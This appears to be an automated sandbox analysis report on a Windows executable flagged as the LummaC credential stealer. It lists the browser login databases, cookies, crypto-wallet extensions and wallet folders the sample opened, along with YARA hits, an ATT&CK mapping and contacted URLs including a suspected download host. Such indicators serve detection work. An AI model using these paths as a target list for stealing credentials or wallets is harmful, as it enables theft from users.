Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2039937644.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k7h8uufe6Y.exe PID: 6372, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: k7h8uufe6Y.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
k7h8uufe6Y.exe	3%	Virustotal		Browse
k7h8uufe6Y.exe	16%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/	0%	Avira URL Cloud	safe
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com:443/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks	0%	Avira URL Cloud	safe
https://aleksandr-block.com/F90=	0%	Avira URL Cloud	safe
https://status.dropbox.com	0%	Avira URL Cloud	safe
http://store.steampowered	0%	Avira URL Cloud	safe
